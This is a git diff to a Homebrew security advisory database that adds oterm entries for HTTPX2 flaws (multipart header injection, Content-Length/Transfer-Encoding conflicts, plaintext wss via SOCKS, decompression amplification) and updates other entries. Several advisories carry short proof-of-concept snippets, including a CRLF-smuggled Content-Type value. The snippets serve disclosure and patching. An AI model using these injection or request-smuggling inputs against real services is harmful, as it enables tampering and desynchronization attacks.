+ "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-oterm-CVE-2026-84380.json b/advisories/BREW-oterm-CVE-2026-84380.json new file mode 100644 index 00000000000..7df054191bc --- /dev/null +++ b/advisories/BREW-oterm-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-oterm-CVE-2026-84380", + "published": "2026-09-10T20:19:31Z", + "modified": "2026-09-10T20:19:31Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "oterm", + "purl": "pkg:brew/oterm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.19.0" + }, + { + "fixed": "0.24.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-oterm-CVE-2026-84381.json b/advisories/BREW-oterm-CVE-2026-84381.json new file mode 100644 index 00000000000..a18b44d6e1e --- /dev/null +++ b/advisories/BREW-oterm-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-oterm-CVE-2026-84381", + "published": "2026-09-10T20:19:30Z", + "modified": "2026-09-10T20:19:30Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "oterm", + "purl": "pkg:brew/oterm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.19.0" + }, + { + "fixed": "0.24.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-oterm-CVE-2026-84382.json b/advisories/BREW-oterm-CVE-2026-84382.json new file mode 100644 index 00000000000..f54ab0227b8 --- /dev/null +++ b/advisories/BREW-oterm-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-oterm-CVE-2026-84382", + "published": "2026-09-10T20:19:30Z", + "modified": "2026-09-10T20:19:30Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "oterm", + "purl": "pkg:brew/oterm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.19.0" + }, + { + "fixed": "0.24.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-pass-git-helper-CVE-2014-1624.json b/advisories/BREW-pass-git-helper-CVE-2014-1624.json index f4cb1cbed99..d165556fa2b 100644 --- a/advisories/BREW-pass-git-helper-CVE-2014-1624.json +++ b/advisories/BREW-pass-git-helper-CVE-2014-1624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pass-git-helper-CVE-2014-1624", "published": "2026-08-13T17:25:33Z", - "modified": "2026-08-13T17:25:33Z", + "modified": "2026-09-10T20:21:28Z", "upstream": [ "GHSA-7372-q459-jxhr", "CVE-2014-1624", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pass-git-helper-CVE-2019-12761.json b/advisories/BREW-pass-git-helper-CVE-2019-12761.json index 9f3451a86a0..be6ec5298ad 100644 --- a/advisories/BREW-pass-git-helper-CVE-2019-12761.json +++ b/advisories/BREW-pass-git-helper-CVE-2019-12761.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pass-git-helper-CVE-2019-12761", "published": "2026-08-13T17:25:33Z", - "modified": "2026-08-13T17:25:33Z", + "modified": "2026-09-10T20:21:28Z", "upstream": [ "GHSA-r6v3-hpxj-r8rv", "CVE-2019-12761", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python-yq-CVE-2017-18342.json b/advisories/BREW-python-yq-CVE-2017-18342.json index 543575615f8..a04752a04db 100644 --- a/advisories/BREW-python-yq-CVE-2017-18342.json +++ b/advisories/BREW-python-yq-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python-yq-CVE-2017-18342", "published": "2026-08-13T17:29:48Z", - "modified": "2026-08-13T17:29:48Z", + "modified": "2026-09-10T20:33:44Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python-yq-CVE-2019-20477.json b/advisories/BREW-python-yq-CVE-2019-20477.json index 1c17a6867c6..9e6a1ad456d 100644 --- a/advisories/BREW-python-yq-CVE-2019-20477.json +++ b/advisories/BREW-python-yq-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python-yq-CVE-2019-20477", "published": "2026-08-13T17:29:48Z", - "modified": "2026-08-13T17:29:48Z", + "modified": "2026-09-10T20:33:44Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python-yq-CVE-2020-14343.json b/advisories/BREW-python-yq-CVE-2020-14343.json index 959a761597a..bc49c27331f 100644 --- a/advisories/BREW-python-yq-CVE-2020-14343.json +++ b/advisories/BREW-python-yq-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python-yq-CVE-2020-14343", "published": "2026-08-13T17:29:48Z", - "modified": "2026-08-13T17:29:48Z", + "modified": "2026-09-10T20:33:44Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python-yq-CVE-2020-1747.json b/advisories/BREW-python-yq-CVE-2020-1747.json index aa617d4b3bd..d1dd687ae91 100644 --- a/advisories/BREW-python-yq-CVE-2020-1747.json +++ b/advisories/BREW-python-yq-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python-yq-CVE-2020-1747", "published": "2026-08-13T17:29:48Z", - "modified": "2026-08-13T17:29:48Z", + "modified": "2026-09-10T20:33:44Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2012-4571.json b/advisories/BREW-snowflake-cli-CVE-2012-4571.json index dabcedca188..4b7a56fd150 100644 --- a/advisories/BREW-snowflake-cli-CVE-2012-4571.json +++ b/advisories/BREW-snowflake-cli-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2012-4571", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2012-5577.json b/advisories/BREW-snowflake-cli-CVE-2012-5577.json index 70ad34b304b..c85734dd6fa 100644 --- a/advisories/BREW-snowflake-cli-CVE-2012-5577.json +++ b/advisories/BREW-snowflake-cli-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2012-5577", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2012-5578.json b/advisories/BREW-snowflake-cli-CVE-2012-5578.json index 1c7e4f93b47..c21a8c4a711 100644 --- a/advisories/BREW-snowflake-cli-CVE-2012-5578.json +++ b/advisories/BREW-snowflake-cli-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2012-5578", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2013-1633.json b/advisories/BREW-snowflake-cli-CVE-2013-1633.json index 9790ccc26a1..4908b13862b 100644 --- a/advisories/BREW-snowflake-cli-CVE-2013-1633.json +++ b/advisories/BREW-snowflake-cli-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2013-1633", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2013-4314.json b/advisories/BREW-snowflake-cli-CVE-2013-4314.json index c294f9ad5d2..53d921a5068 100644 --- a/advisories/BREW-snowflake-cli-CVE-2013-4314.json +++ b/advisories/BREW-snowflake-cli-CVE-2013-4314.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2013-4314", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-6748-36qp-fx6r", "CVE-2013-4314", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2014-0012.json b/advisories/BREW-snowflake-cli-CVE-2014-0012.json index d901cee9398..ebdecaf036c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2014-0012.json +++ b/advisories/BREW-snowflake-cli-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2014-0012", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2014-1402.json b/advisories/BREW-snowflake-cli-CVE-2014-1402.json index e36e3a45396..f079a21f0aa 100644 --- a/advisories/BREW-snowflake-cli-CVE-2014-1402.json +++ b/advisories/BREW-snowflake-cli-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2014-1402", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2014-1829.json b/advisories/BREW-snowflake-cli-CVE-2014-1829.json index 3c46b66173c..f84de33e3a9 100644 --- a/advisories/BREW-snowflake-cli-CVE-2014-1829.json +++ b/advisories/BREW-snowflake-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2014-1829", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2014-1830.json b/advisories/BREW-snowflake-cli-CVE-2014-1830.json index 8954e3757fd..ab78ec8626b 100644 --- a/advisories/BREW-snowflake-cli-CVE-2014-1830.json +++ b/advisories/BREW-snowflake-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2014-1830", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2015-2296.json b/advisories/BREW-snowflake-cli-CVE-2015-2296.json index 95cf0939e92..c6f9519ac23 100644 --- a/advisories/BREW-snowflake-cli-CVE-2015-2296.json +++ b/advisories/BREW-snowflake-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2015-2296", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2015-5237.json b/advisories/BREW-snowflake-cli-CVE-2015-5237.json index 0086bf70637..c84017193b4 100644 --- a/advisories/BREW-snowflake-cli-CVE-2015-5237.json +++ b/advisories/BREW-snowflake-cli-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2015-5237", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ 